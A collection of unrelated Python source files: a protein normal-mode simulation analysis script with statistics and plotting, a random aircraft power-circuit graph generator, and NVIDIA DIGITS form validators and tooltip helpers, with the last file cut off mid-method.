        finish_prog = input("Press 'y' when finished\n:")
    plt.close('all')
    print("Finished!")
    quit()  # end of program
# Script entry point: run the interactive analysis pipeline.
if __name__ == '__main__':
    main()
| |
"""
Created on Nov 19, 2015
@author: victor
"""
import numpy
import os
from optparse import OptionParser
from nma_algo_char.common import load_control_json, pair_parameter_values,\
parameter_value_to_string, create_directory, MetropolisMCSimulator,\
scatter_plot_by_hue
from collections import defaultdict
from pandas.core.frame import DataFrame
import matplotlib.pyplot as plt
import pandas as pd
import scipy.stats
import cPickle as pickle
from nma_algo_char.data_retrieval import load_ic_data, load_cc_data,\
process_after_perturb_rmsd, process_energy_differences, get_mode_frequencies
from imghdr import what
def remove_energy_outlayers(all_data, ENERGY_LABEL):
    """Drop the extreme ~2% of energy values from every column of all_data.

    Computes (ener_low, ener_high) as the bounds of the central 98% of the
    energy distribution, keeps only samples strictly inside that range, and
    filters every per-sample array in all_data with the same boolean mask
    (converting each column to a numpy array in the process).
    Returns (ener_low, ener_high) so callers can reuse the bounds.
    """
    # index marking the 98th-percentile position
    outlayer_margin = int(len(all_data[ENERGY_LABEL])*0.98)
    # smallest value of the top-98% (descending) slice -> lower bound
    ener_low = min(sorted(all_data[ENERGY_LABEL], reverse = True)[:outlayer_margin])
    # largest value of the bottom-98% (ascending) slice -> upper bound
    ener_high = max(sorted(all_data[ENERGY_LABEL])[:outlayer_margin])
    # NOTE(review): this elementwise comparison assumes all_data[ENERGY_LABEL]
    # is a numpy array; if it is still a plain list, Python 2 falls back to
    # object ordering and yields a single bool -- confirm with the caller.
    indices = numpy.logical_and(all_data[ENERGY_LABEL] < ener_high,
                                all_data[ENERGY_LABEL] > ener_low)
    for label in all_data:
        print label, "initial len ", len(all_data[label]),
        all_data[label] = numpy.array(all_data[label])
        all_data[label] = all_data[label][indices]
        print "final len ", len(all_data[label])
    return ener_low, ener_high
# Main driver (Python 2): aggregate per-parameter-pair simulation results,
# build plots (optional) and write correlation statistics.
if __name__ == '__main__':
    # ------------------------------------------------------------------
    # Command-line handling
    # ------------------------------------------------------------------
    parser = OptionParser()
    parser.add_option("--experiment", dest="experiment")
    parser.add_option("--results", dest="results_folder")
    parser.add_option("--workspace", dest="workspace")
    parser.add_option("--folder", default= "info" ,dest="folder")
    parser.add_option("--plot", action = "store_true", default= False, dest="do_plots")
    (options, args) = parser.parse_args()
    if not options.experiment:
        parser.error('Experiment file not given')
    if not options.results_folder:
        parser.error('Results folder not given')
    experiment_details = load_control_json(options.experiment)
    # a workspace given on the command line overrides the experiment file's
    if options.workspace is not None:
        workspace = os.path.normpath(options.workspace)
    else:
        workspace = os.path.normpath(experiment_details["workspace"])
    # Create a place for the results
    create_directory(os.path.join(options.results_folder, os.path.basename(workspace)))
    # Initialize stuff
    all_data = defaultdict(list)
    relax_iterations = []
    acceptances = defaultdict(lambda: defaultdict(list))
    avg_energy = defaultdict(list)
    std_energy = defaultdict(list)
    avg_rmsd = defaultdict(list)
    avg_time = defaultdict(list)
    norm_rmsd = defaultdict(list)
    norm_energy = defaultdict(list)
    mode_frequencies = defaultdict(list)
    modes_p_v = defaultdict(list)
    ENERGY_LABEL = "$\Delta$ U"
    RMSD_LABEL = "RMSD"
    nmd_file_name = {"CC":"normalized_modes.1.nmd",
                     "IC":"normalized_modes_cc.1.nmd"}
    v1s = []
    v2s = []
    # ------------------------------------------------------------------
    # Load and process one results folder per (p1, p2) value pair
    # ------------------------------------------------------------------
    for (p1,v1),(p2,v2) in pair_parameter_values(experiment_details["check"], experiment_details["parameter_values"]):
        v1s.append(v1)
        v2s.append(v2)
        folder_name = "%s_%s_%s_%s_%s"%(experiment_details["prefix"],
                                        experiment_details["parameter_abbv"][p1], parameter_value_to_string(v1),
                                        experiment_details["parameter_abbv"][p2], parameter_value_to_string(v2))
        # CC and IC runs store their data differently
        if experiment_details["prefix"] == "CC":
            raw_data, data_len = load_cc_data(os.path.join(workspace,
                                                           folder_name,
                                                           options.folder),
                                              full_pele_energy = False,
                                              skip_first = 15)
        if experiment_details["prefix"] == "IC":
            raw_data, data_len = load_ic_data(os.path.join(workspace,
                                                           folder_name,
                                                           options.folder),
                                              skip_first = 15)
        # Start processing
        modes = raw_data["modes"]
        _mode_frequencies = get_mode_frequencies(modes,
                                                 os.path.join(workspace, folder_name, "info",
                                                              nmd_file_name[experiment_details["prefix"]])
                                                 )
        energy_increments = process_energy_differences(raw_data)
        rmsd_increments = process_after_perturb_rmsd(raw_data)
        acc_mean_and_avg = MetropolisMCSimulator(energy_increments).perform_simulation(
            min(100,len(energy_increments)), 20, 300)
        # Fill all data structure
        all_data[ENERGY_LABEL].extend(energy_increments)
        all_data[RMSD_LABEL].extend(rmsd_increments)
        all_data["Mode"].extend(modes)
        all_data["time_per_step"].extend(raw_data["time_per_step"])
        all_data[p1].extend([v1]*data_len)
        all_data[p2].extend([v2]*data_len)
        # Fill the other structures
        acceptances[v1,v2] = acc_mean_and_avg
        avg_rmsd[v1,v2] = (numpy.mean(rmsd_increments),
                           numpy.std(rmsd_increments))
        avg_energy[v1,v2] = numpy.mean(energy_increments)
        std_energy[v1,v2] = numpy.std(energy_increments)
        print std_energy[v1,v2]
        avg_time[v1,v2] = (numpy.mean(raw_data["time_per_step"]),
                           numpy.std(raw_data["time_per_step"]))
        norm_rmsd[v1,v2] = numpy.array(rmsd_increments) / numpy.max(rmsd_increments)
        norm_energy[v1,v2] = numpy.array(energy_increments) / numpy.max(numpy.abs(energy_increments))
        modes_p_v[v1,v2] = numpy.array(modes)+1 # Modes will start from index 1 in the plots
        mode_frequencies[v1,v2] = _mode_frequencies
    v1s = sorted(list(set(v1s)))
    v2s = sorted(list(set(v2s)))
    # Remove outliers
    energy_with_outlayers = numpy.array(all_data[ENERGY_LABEL])
    ener_low, ener_high = remove_energy_outlayers(all_data, ENERGY_LABEL)
    # Save all_data in pickled format
    pickle.dump(all_data, open(os.path.join(options.results_folder,os.path.basename(workspace),"all_data.pickle"),"w"))
    db = DataFrame.from_dict(all_data, orient="index")
    db.transpose().to_csv(os.path.join(options.results_folder,os.path.basename(workspace),"data.csv"))
    db.columns = db.columns.get_level_values(0)
    # ------------------------------------------------------------------
    # Plotting (only with --plot)
    # ------------------------------------------------------------------
    if options.do_plots:
        import seaborn as sns
        sns.set_style("whitegrid")
        # Facet grid to see rmsd vs energy vs dispfactor vs relaxation whatever
        g = sns.FacetGrid(db.transpose(), col=p1, row=p2, hue="Mode",
                          sharex = True, sharey = True, margin_titles=True,
                          legend_out = True, ylim= (ener_low, ener_high))
        g.map(plt.scatter, RMSD_LABEL, ENERGY_LABEL)
        g.add_legend(label_order = sorted(g._legend_data.keys()))
        g.fig.suptitle("RMSD - $\Delta U$ - displacement - relaxation intensity (colored by mode)")
        g.savefig(os.path.join(options.results_folder,os.path.basename(workspace),os.path.basename(workspace)+"_u_rmsd.svg"))
        plt.close()
        # Global rmsd vs time, color by dispfact and relax
        colors = sns.color_palette("hls", len( set(all_data[p1])))
        ax = plt.subplot2grid((2,2), (0,0))
        scatter_plot_by_hue(all_data[RMSD_LABEL], all_data["time_per_step"], all_data[p1], colors)
        ax.legend(loc='upper center', bbox_to_anchor=(0.5, -0.05))
        ax.set_ylabel("Tps (s) (hue=%s)"%p1)
        ax = plt.subplot2grid((2,2), (1,0))
        scatter_plot_by_hue(all_data[RMSD_LABEL], all_data["time_per_step"], all_data[p2], colors)
        ax.legend(loc='upper center', bbox_to_anchor=(0.5, -0.05))
        ax.set_ylabel("Tps (s) (hue=%s)"%p2)
        ax.set_xlabel("RMSD")
        # Global energy vs time, color by dispfact and relax
        ax = plt.subplot2grid((2,2), (0,1))
        scatter_plot_by_hue(all_data[ENERGY_LABEL], all_data["time_per_step"], all_data[p1], colors)
        ax = plt.subplot2grid((2,2), (1,1))
        scatter_plot_by_hue(all_data[ENERGY_LABEL], all_data["time_per_step"], all_data[p2], colors)
        ax.set_xlabel("Energy" )
        plt.savefig(os.path.join(options.results_folder,os.path.basename(workspace),os.path.basename(workspace)+"_vs_timespep.svg"))
        plt.close()
        # Define categories for acceptance
        # from 100% to 35%, yellow, high
        # from 35% to 25%, green, good acceptance
        # from 0 to 25%, red, bad acceptance
        cat_acceptances = {}
        for key in acceptances:
            acceptance = acceptances[key][0]
            if acceptance <= 1. and acceptance > 0.35:
                cat_acceptances[key] = "high"
            elif acceptance <= 0.35 and acceptance > 0.25:
                cat_acceptances[key] = "good"
            else:
                cat_acceptances[key] = "low"
        # rmsd vs time and color by acceptance
        plt.figure()
        keys = sorted(avg_rmsd.keys())
        labels = []
        colors = {"high": "yellow","good":"green" ,"low":"red"}
        for acc_cat in ["high","good","low"]:
            x = []
            y = []
            for x_k in avg_rmsd:
                if cat_acceptances[x_k] == acc_cat:
                    x.append(avg_rmsd[x_k][0])
                    y.append(avg_time[x_k][0])
            plt.scatter(x, y, label = acc_cat, color = colors[acc_cat])
            #plt.errorbar(x, y, xerr=avg_rmsd[key][1], yerr=acceptances[key][1], fmt='o')
        plt.title("Avg. RMSD vs Avg. Time per Step")
        plt.xlabel("Avg. RMSD (${\AA}$)")
        plt.ylabel("Avg. Time per Step (s)")
        plt.legend()
        plt.savefig(os.path.join(options.results_folder,os.path.basename(workspace),os.path.basename(workspace)+"_rmsd_vs_tps_hue_acc.svg"))
        plt.close()
        # inc_U vs time and color by acceptance
        plt.figure()
        keys = sorted(avg_rmsd.keys())
        labels = []
        colors = {"high": "yellow","good":"green" ,"low":"red"}
        for acc_cat in ["high","good","low"]:
            x = []
            y = []
            for x_k in avg_rmsd:
                if cat_acceptances[x_k] == acc_cat:
                    x.append(avg_energy[x_k])
                    y.append(avg_time[x_k][0])
            plt.scatter(x, y, label = acc_cat, color = colors[acc_cat])
            #plt.errorbar(x, y, xerr=avg_rmsd[key][1], yerr=acceptances[key][1], fmt='o')
        plt.title("Avg. $\Delta U$ vs Time per Step (hue=acceptance)")
        plt.xlabel("Avg. $\Delta U$ (kcal/mol) ")
        plt.ylabel("Avg. Time per Step (s)")
        plt.legend()
        plt.savefig(os.path.join(options.results_folder,os.path.basename(workspace),os.path.basename(workspace)+"_energy_vs_tps_hue_acc.svg"))
        plt.close()
        # Do rmsd/energy vs acceptance
        plt.figure()
        keys = sorted(avg_rmsd.keys())
        labels = []
        colors = sns.color_palette("hls", len(keys))
        for i, key in enumerate(keys):
            x = avg_rmsd[key][0] / avg_energy[key]
            y = acceptances[key][0]
            label = "%.2f %.2f"%key
            plt.scatter(x, y, label = label, color = colors[i])
            #plt.errorbar(x, y, xerr=avg_rmsd[key][1], yerr=acceptances[key][1], fmt='o')
            plt.annotate(
                label,
                xy = (x, y), xytext = (5, 5),
                textcoords = 'offset points', ha = 'right', va = 'bottom', size=6)
        plt.xlabel("RMSD / energy")
        plt.ylabel("Acceptance")
        plt.savefig(os.path.join(options.results_folder,os.path.basename(workspace),os.path.basename(workspace)+"_rmsd_energy_vs_acc.svg"))
        plt.close()
        # Do rmsd vs acceptance
        plt.figure()
        keys = sorted(avg_rmsd.keys())
        labels = []
        colors = sns.color_palette("hls", len(keys))
        for i, key in enumerate(keys):
            x = avg_rmsd[key][0]
            y = acceptances[key][0]
            label = "%.2f %.2f"%key
            plt.scatter(x, y, label = label, color = colors[i])
            plt.errorbar(x, y, xerr = avg_rmsd[key][1], yerr=acceptances[key][1], fmt='o')
            plt.annotate(
                label,
                xy = (x, y), xytext = (5, 5),
                textcoords = 'offset points', ha = 'right', va = 'bottom', size=6)
        plt.xlabel("RMSD")
        plt.ylabel("Acceptance")
        plt.savefig(os.path.join(options.results_folder,os.path.basename(workspace),os.path.basename(workspace)+"_rmsd_vs_acc.svg"))
        plt.close()
        # Do energy vs acceptance
        plt.figure()
        keys = sorted(avg_rmsd.keys())
        labels = []
        colors = sns.color_palette("hls", len(keys))
        for i, key in enumerate(keys):
            x = avg_energy[key]
            y = acceptances[key][0]
            label = "%.2f %.2f"%key
            plt.errorbar(x, y, xerr = std_energy[key], yerr=acceptances[key][1], color = colors[i])
            plt.scatter(x, y, label = label, color = colors[i])
            plt.annotate(
                label,
                xy = (x, y), xytext = (5, 5),
                textcoords = 'offset points', ha = 'right', va = 'bottom', size=6)
        plt.xlabel("Energy")
        plt.ylabel("Acceptance")
        plt.savefig(os.path.join(options.results_folder,os.path.basename(workspace),os.path.basename(workspace)+"_energy_vs_acc.svg"))
        plt.close()
        # Do energy vs rmsd
        plt.figure()
        keys = sorted(avg_rmsd.keys())
        labels = []
        colors = sns.color_palette("hls", len(keys))
        markers = ["o", "s", "h", "*", "+", "D"]
        colors = sns.color_palette("hls", len(v1s))
        for i, v1 in enumerate(v1s):
            for j,v2 in enumerate(v2s):
                key = (v1,v2)
                x = avg_rmsd[key][0]
                x_err = avg_rmsd[key][1]
                y = avg_energy[key]
                y_err = std_energy[key]
                label = "%.2f %.2f"%key
                plt.errorbar(x, y,
                             xerr=x_err, yerr=y_err,
                             marker=markers[j],
                             color=colors[i],
                             label = label, mec='black',mew=1)
                plt.scatter(x, y, marker=markers[j], linewidths=1, edgecolors='black', color=colors[i])
        plt.xlabel("RMSD")
        plt.ylabel("$\Delta U$")
        plt.legend()
        plt.savefig(os.path.join(options.results_folder,
                                 os.path.basename(workspace),
                                 os.path.basename(workspace)+"_rmsd_vs_energy_avgs.svg"))
        plt.close()
    # ------------------------------------------------------------------
    # Text results (correlation statistics)
    # ------------------------------------------------------------------
    other_results = open(os.path.join(options.results_folder,
                                      os.path.basename(workspace),"other_results.txt"),"w")
    def save_result(what):
        # echo to stdout and append to other_results.txt
        print what
        other_results.write(what+"\n")
    #---------------------------------------
    # Energy vs RMSD correlation
    #---------------------------------------
    ranked_rmsd = scipy.stats.rankdata(numpy.array(all_data[RMSD_LABEL]))
    ranked_energy = scipy.stats.rankdata(numpy.array(all_data[ENERGY_LABEL]))
    # rescale the larger rank range down so both ranks share the same span
    min_rank = min(numpy.max(ranked_rmsd),numpy.max(ranked_energy))
    if min_rank == numpy.min(ranked_rmsd):
        ranked_energy *= min_rank /numpy.max(ranked_energy)
    else:
        ranked_rmsd *= min_rank /numpy.max(ranked_rmsd)
    rho, p_val = scipy.stats.spearmanr(ranked_rmsd, ranked_energy)
    save_result( "Does the RMSD and energy inc. correlate?\t%.2f\t%.2f"%(rho,p_val))
    #---------------------------------------
    # Displacement (normalized) vs Frequency
    #---------------------------------------
    all_freqs = []
    for key in mode_frequencies: all_freqs.extend(mode_frequencies[key])
    all_norm_rmsd = []
    for key in norm_rmsd: all_norm_rmsd.extend(norm_rmsd[key])
    all_modes = []
    for key in modes_p_v: all_modes.extend(modes_p_v[key])
    # X is the independent var. In this case a discrete (or even categorical) one.
    # Y is the dependent var, is continuous.
    # sns.regplot(numpy.array(all_freqs), numpy.array(all_norm_rmsd))
    # plt.show()
    # We can use spearman rank (rho, symmetric) to check the "association force" or correlation
    # For this it is needed to convert both to categorical ranked variables.
    # frequencies is already a ranked categorical variable (is it discretized? It may be not
    # because we do not have, and it is not possible to have, values in the full range)
    ranked_norm_rmsd = scipy.stats.rankdata(all_norm_rmsd)
    # rescale in 1-10 like modes
    scaled_ranked_norm_rmsd = ranked_norm_rmsd*10./numpy.max(ranked_norm_rmsd)
    rho, p_val = scipy.stats.spearmanr(scaled_ranked_norm_rmsd, all_modes)
    # The smaller the p-value is, the better (evidence agains the hypothesis that variables are uncorrelated)
    #save_result( "Does the (ANM) norm. RMSD depend on the frequency of the mode?\t %.3f\t (%.3f)"%(rho,p_val))
    #--------------------------------------------
    # Energy increment (normalized) vs Frequency
    #--------------------------------------------
    all_norm_energies = []
    for key in norm_energy: all_norm_energies.extend(norm_energy[key])
    # NOTE(review): sns is only imported inside the --plot branch above, so
    # this line raises NameError when --plot is not given -- confirm whether
    # it belongs under options.do_plots.
    sns.regplot(numpy.array(all_freqs), numpy.array(all_norm_energies))
    # plt.show()
    ranked_norm_energies = scipy.stats.rankdata(all_norm_energies)
    scaled_ranked_norm_energies = ranked_norm_energies*10./numpy.max(ranked_norm_energies)
    rho, p_val = scipy.stats.spearmanr(ranked_norm_energies, all_modes)
    #save_result( "Does the (ANM) norm. energy increment depend on the frequency of the mode?\t %.3f\t (%.3f)"%(rho,p_val))
    #-----------------------------------------------------------
    # Time per step (cont. dep.) and p1, p2 (cat. ranked ind.)
    #-----------------------------------------------------------
    # rank them
    for p in [p1,p2]:
        ranked_time = scipy.stats.rankdata(numpy.array(all_data["time_per_step"]).astype(float))
        ranked_p = scipy.stats.rankdata(numpy.array(all_data[p]))
        # norm range of time to range of p
        ranked_time *= numpy.max(ranked_p)/numpy.max(ranked_time)
        rho, p_val = scipy.stats.spearmanr(ranked_time, ranked_p)
        save_result( "Does the time per (ANM) step depend on %s?\t%.3f\t%.3f"%(p,rho,p_val))
    #-----------------------------------------------------------
    # RMSD (cont. dep.) and p1, p2 (cat. ranked ind.)
    #-----------------------------------------------------------
    #in this case rmsd is not normed
    for p in [p1,p2]:
        ranked_p = scipy.stats.rankdata(numpy.array(all_data[p]))
        ranked_rmsd = scipy.stats.rankdata(numpy.array(all_data[RMSD_LABEL]))
        scaled_ranked_rmsd = ranked_rmsd*numpy.max(ranked_p)/numpy.max(ranked_rmsd)
        rho, p_val = scipy.stats.spearmanr(scaled_ranked_rmsd, ranked_p)
        save_result( "Does the (ANM) RMSD depend on %s?\t%.3f\t%.3f"%(p,rho,p_val))
    #-----------------------------------------------------------
    # Energy increment (cont. dep.) and p1, p2 (cat. ranked ind.)
    #-----------------------------------------------------------
    for p in [p1,p2]:
        ranked_p = scipy.stats.rankdata(numpy.array(all_data[p]))
        ranked_energies = scipy.stats.rankdata(numpy.array(all_data[ENERGY_LABEL]))
        scaled_ranked_energies = ranked_energies*numpy.max(ranked_p)/numpy.max(ranked_energies)
        rho, p_val = scipy.stats.spearmanr(scaled_ranked_energies, ranked_p)
        save_result( "Does the (ANM) Energy increment depend on %s?\t%.3f\t%.3f"%(p,rho,p_val))
    # Energy absolute values
    smaller_than_0 = []
    bigger_than_0 = []
    for energy in energy_with_outlayers:
        if energy <= 0:
            smaller_than_0.append(energy)
        else:
            bigger_than_0.append(energy)
    save_result( "[Energy] Number of <0: %.2f Mean of > 0: %.2f (%.2f)"%(100*float(len(smaller_than_0)) /len(all_data[ENERGY_LABEL]),
                                                                         numpy.mean(bigger_than_0), numpy.std(bigger_than_0)))
    save_result( "Avg. time per step %.2f (%.2f)"%(numpy.mean(all_data["time_per_step"]), numpy.std(all_data["time_per_step"])))
    other_results.close()
| |
import time
import math
import random
from specs import *
# generate a random circuit
# The circuit created has contraints including:
# Only TRUs and sensors can have a wire connected to other components; others must have a contactor
# Generators cannot connect with other generators with a contactor
# Number of edges connected to generators or sensors or TRUs must be 1 or 2
# Number of edges connected to buses can be any integer larger than 0
# The inport of TRU must have a live path with the DC buses
# The outport of TRU must have a live path with the AC buses
# Generators are in the AC part
def generate_random_circuit(num_comp, ratio_sensor_comp):
    """Build a random aircraft electric-power network as a directed graph.

    Parameters
    ----------
    num_comp : int
        Number of non-bus components (split randomly between generators and
        TRUs); the bus count equals num_comp as well.
    ratio_sensor_comp : float
        Sensor-to-component ratio; sensor count = ceil(num_comp * ratio).

    Returns
    -------
    A DiGraph whose nodes carry (name, type) attributes and whose edges carry
    a 'type' of 'wire' or 'contactor' (contactors also get a 'name').  Every
    physical link is stored as the symmetric edge pair (i, j), (j, i).

    NOTE(review): nx (networkx) and copy are not imported in this module;
    presumably they come from "from specs import *" -- confirm.
    """
    num_sensor = int(math.ceil(num_comp * ratio_sensor_comp))
    num_generator = random.randint(1, num_comp - 1)
    num_TRU = num_comp - num_generator
    num_bus = num_comp
    num_DC_bus = random.randint(1, num_bus - 1)
    num_AC_bus = num_bus - num_DC_bus
    DC_part = []      # node ids still eligible for more DC-side edges
    AC_part = []      # node ids still eligible for more AC-side edges
    generators = []
    G = nx.DiGraph()
    num = 1 # Set the initial number of nodes
    # Create nodes and assign AC and DC part
    for i in range(0, num_sensor):
        G.add_node(str(num), name = 'S' + str(i+1), type = 'sensor')
        # each sensor is placed on a random side of the network
        if random.randint(0, 1) == 0:
            AC_part.append(str(num))
        else:
            DC_part.append(str(num))
        num = num + 1
    for i in range(0, num_generator):
        G.add_node(str(num), name = 'G' + str(i+1), type = 'generator')
        generators.append(str(num))
        num = num + 1
    for i in range(0, num_TRU):
        # a TRU is modelled as a DC node plus an AC node joined by a wire
        G.add_node(str(num), name = 'T' + str(i+1) + '_dc', type = 'rectifier_dc')
        G.add_node(str(num) + '_ac', name = 'T' + str(i+1) + '_ac', type = 'rectifier_ac')
        G.add_edge(str(num) + '_ac', str(num), type = 'wire')
        AC_part.append(str(num) + '_ac')
        DC_part.append(str(num))
        num = num + 1
    for i in range(0, num_DC_bus):
        G.add_node(str(num), name = 'B' + str(i+1), type = 'bus')
        DC_part.append(str(num))
        num = num + 1
    for i in range(num_DC_bus, num_AC_bus + num_DC_bus):
        G.add_node(str(num), name = 'B' + str(i+1), type = 'bus')
        AC_part.append(str(num))
        num = num + 1
    # Create edges between generators and AC components
    num_cont = 1
    for i in generators:
        num_neighbors = random.randint(1, 2)
        if num_neighbors == 2 and len(AC_part) == 1:
            num_neighbors = 1
        neighbors = random.sample(AC_part, num_neighbors)
        for j in neighbors:
            if G.node[j]['type'] == 'bus':
                # generator-bus links always get a (named) contactor
                G.add_edges_from([(i, j), (j, i)], name = 'C' + str(num_cont), type = 'contactor')
                num_cont = num_cont + 1
            else:
                edge_type = random.choice(['wire', 'contactor'])
                if edge_type == 'contactor':
                    G.add_edges_from([(i, j), (j, i)], name = 'C' + str(num_cont), type = 'contactor')
                    num_cont = num_cont + 1
                else:
                    G.add_edges_from([(i, j), (j, i)], type = 'wire')
                # retire non-bus nodes that reached their 1-2 edge quota
                if G.node[j]['type'] == 'rectifier_ac':
                    AC_part.remove(j)
                else:
                    if len(G.neighbors(j)) > 1:
                        AC_part.remove(j)
    # Create other AC edges
    # len_AC = len(AC_part)
    # for k in range(0, len_AC - num_AC_bus):
    while len(AC_part) > num_AC_bus:
        i = AC_part[0]
        AC_part.remove(i)
        if G.node[i]['type'] == 'rectifier_ac':
            # TRU AC ports get exactly one extra AC connection
            j = random.choice(AC_part)
            edge_type = random.choice(['wire', 'contactor'])
            if edge_type == 'contactor':
                G.add_edges_from([(i, j), (j, i)], name = 'C' + str(num_cont), type = 'contactor')
                num_cont = num_cont + 1
            else:
                G.add_edges_from([(i, j), (j, i)], type = 'wire')
            if G.node[j]['type'] == 'rectifier_ac':
                AC_part.remove(j)
            else:
                if len(G.neighbors(j)) > 1 and G.node[j]['type'] != 'bus':
                    AC_part.remove(j)
        else:
            if G.node[i]['type'] == 'sensor':
                # sensors may hold 1-2 edges total, minus those already present
                num_neighbors = random.randint(1, 2) - len(G.neighbors(i))
                if num_neighbors > 0:
                    if num_neighbors == 2 and len(AC_part) == 1:
                        num_neighbors = 1
                    neighbors = random.sample(AC_part, num_neighbors)
                    for j in neighbors:
                        edge_type = random.choice(['wire', 'contactor'])
                        if edge_type == 'contactor':
                            G.add_edges_from([(i, j), (j, i)], name = 'C' + str(num_cont), type = 'contactor')
                            num_cont = num_cont + 1
                        else:
                            G.add_edges_from([(i, j), (j, i)], type = 'wire')
                        if G.node[j]['type'] == 'rectifier_ac':
                            AC_part.remove(j)
                        else:
                            if len(G.neighbors(j)) > 1 and G.node[j]['type'] != 'bus':
                                AC_part.remove(j)
    # Create edges between AC buses
    candidates = copy.copy(AC_part)
    for k in range(0, len(AC_part) - 1):
        i = candidates[0]
        candidates.remove(candidates[0])
        num_neighbors = random.randint(0, len(candidates))
        neighbors = random.sample(candidates, num_neighbors)
        for j in neighbors:
            G.add_edges_from([(i, j), (j, i)], name = 'C' + str(num_cont), type = 'contactor')
            num_cont = num_cont + 1
    # Create DC edges (mirror of the AC pass above, for rectifier_dc nodes)
    while len(DC_part) > num_DC_bus:
        i = DC_part[0]
        DC_part.remove(i)
        if G.node[i]['type'] == 'rectifier_dc':
            j = random.choice(DC_part)
            edge_type = random.choice(['wire', 'contactor'])
            if edge_type == 'contactor':
                G.add_edges_from([(i, j), (j, i)], name = 'C' + str(num_cont), type = 'contactor')
                num_cont = num_cont + 1
            else:
                G.add_edges_from([(i, j), (j, i)], type = 'wire')
            if G.node[j]['type'] == 'rectifier_dc':
                DC_part.remove(j)
            else:
                if len(G.neighbors(j)) > 1 and G.node[j]['type'] != 'bus':
                    DC_part.remove(j)
        else:
            if G.node[i]['type'] == 'sensor':
                num_neighbors = random.randint(1, 2) - len(G.neighbors(i))
                if num_neighbors > 0:
                    if num_neighbors == 2 and len(DC_part) == 1:
                        num_neighbors = 1
                    neighbors = random.sample(DC_part, num_neighbors)
                    for j in neighbors:
                        edge_type = random.choice(['wire', 'contactor'])
                        if edge_type == 'contactor':
                            G.add_edges_from([(i, j), (j, i)], name = 'C' + str(num_cont), type = 'contactor')
                            num_cont = num_cont + 1
                        else:
                            G.add_edges_from([(i, j), (j, i)], type = 'wire')
                        if G.node[j]['type'] == 'rectifier_dc':
                            DC_part.remove(j)
                        else:
                            if len(G.neighbors(j)) > 1 and G.node[j]['type'] != 'bus':
                                DC_part.remove(j)
    # Create edges between DC buses
    candidates = copy.copy(DC_part)
    for k in range(0, len(DC_part) - 1):
        i = candidates[0]
        candidates.remove(candidates[0])
        num_neighbors = random.randint(0, len(candidates))
        neighbors = random.sample(candidates, num_neighbors)
        for j in neighbors:
            G.add_edges_from([(i, j), (j, i)], name = 'C' + str(num_cont), type = 'contactor')
            num_cont = num_cont + 1
    return G
# generate random controllable contactor list
def generate_random_cc(G, ratio_cc):
    """Pick a random subset of the circuit's contactors to be controllable.

    Parameters
    ----------
    G : graph whose contactor edges carry a 'name' attribute.
    ratio_cc : float in [0, 1]
        Fraction of the distinct contactors to select.

    Returns a list of floor(#contactors * ratio_cc) contactor names.
    """
    name_data = nx.get_edge_attributes(G, 'name').values()
    # Deduplicate while keeping first-seen order.  The original used
    # list.count() per element, an O(n^2) membership scan.
    all_contactors = []
    seen = set()
    for contactor_name in name_data:
        if contactor_name not in seen:
            seen.add(contactor_name)
            all_contactors.append(contactor_name)
    num_cc = int(math.floor(float(len(all_contactors)) * ratio_cc))
    con_conts = random.sample(all_contactors, num_cc)
    return con_conts
# generate random dict with value 0 or 1
def generate_dict(a_list):
    """Map every element of ``a_list`` to a random value of 0 or 1."""
    return {key: random.randint(0, 1) for key in a_list}
# verify whether the results are the same
def verifier(a, b):
    """Terminate the program if the two results differ.

    Args:
        a, b: any two comparable results.

    Returns:
        0 when the results are equal; otherwise the process exits.
    """
    if a != b:
        # print() call form so the module also runs under Python 3.
        print('Error: two results are not the same!')
        exit()
    return 0
| |
# Copyright (c) 2015-2016, NVIDIA CORPORATION. All rights reserved.
from __future__ import absolute_import
from werkzeug.datastructures import FileStorage
import wtforms
from wtforms import SubmitField
from wtforms import validators
from digits.utils.routing import get_request_arg
def validate_required_iff(**kwargs):
    """
    Conditional DataRequired validator for use within a wtforms.Form.

    The field is treated as required only when every keyword argument
    matches the corresponding form field's data. When any condition is
    unmet, all validation for the field is skipped.
    """
    def _validator(form, field):
        conditions_met = True
        for key, value in kwargs.items():
            if getattr(form, key).data != value:
                conditions_met = False
        if not conditions_met:
            # Not required under these conditions: drop any accumulated
            # errors and stop the validation chain for this field.
            field.errors[:] = []
            raise validators.StopValidation()
        # Required: reject missing data, blank strings and empty uploads.
        missing = field.data is None
        if not missing and isinstance(field.data, (str, unicode)):
            missing = not field.data.strip()
        if not missing and isinstance(field.data, FileStorage):
            missing = not field.data.filename.strip()
        if missing:
            raise validators.ValidationError('This field is required.')
    return _validator
def validate_greater_than(fieldname):
    """
    Validate that this field's value is at least the value of another field.

    Note: despite the name, equality is accepted — an error is raised only
    when this field's value is strictly less than the other field's.

    :param fieldname:
        The name of the other field to compare against.
    """
    def _validator(form, field):
        try:
            other = form[fieldname]
        except KeyError:
            raise validators.ValidationError(
                field.gettext(u"Invalid field name '%s'.") % fieldname)
        # Empty values are skipped entirely.
        if field.data != '' and field.data < other.data:
            raise validators.ValidationError(
                field.gettext(u'Field must be greater than %s.' % fieldname))
    return _validator
class Tooltip(object):
    """
    Renders a Bootstrap question-mark tooltip for an HTML form field.
    """
    def __init__(self, field_id, for_name, text):
        # field_id: id of the form field (default target for 'for').
        # for_name: name used to build the rendered element's name attribute.
        # text: tooltip body, emitted into the title attribute.
        self.field_id = field_id
        self.text = text
        self.for_name = for_name
    def __str__(self):
        return self()
    def __unicode__(self):
        return self()
    def __html__(self):
        return self()
    def __call__(self, text=None, **kwargs):
        # Normalize the reserved-word 'for' attribute the way wtforms does.
        # NOTE(review): the computed kwargs are never used by the markup
        # below — confirm whether this is intentional.
        if 'for_' in kwargs:
            kwargs['for'] = kwargs.pop('for_')
        else:
            kwargs.setdefault('for', self.field_id)
        markup = ('<span name="%s_explanation"'
                  ' class="explanation-tooltip glyphicon glyphicon-question-sign"'
                  ' data-container="body"'
                  ' title="%s"'
                  ' ></span>') % (self.for_name, self.text)
        return wtforms.widgets.HTMLString(markup)
    def __repr__(self):
        return 'Tooltip(%r, %r, %r)' % (self.field_id, self.for_name, self.text)
class Explanation(object):
    """
    An HTML form explanation.

    Renders a hidden <div> containing the contents of an HTML template plus
    a question-mark link that displays the div in a bootbox dialog.
    """
    def __init__(self, field_id, for_name, filename):
        # field_id: id of the form field (default target for 'for').
        # for_name: name used to build the explanation element ids.
        # filename: template file containing the explanation HTML.
        self.field_id = field_id
        self.file = filename
        self.for_name = for_name
    def __str__(self):
        return self()
    def __unicode__(self):
        return self()
    def __html__(self):
        return self()
    def __call__(self, file=None, **kwargs):
        # Mirror wtforms' handling of the reserved word 'for'.
        # NOTE(review): the computed kwargs are not used in the markup below.
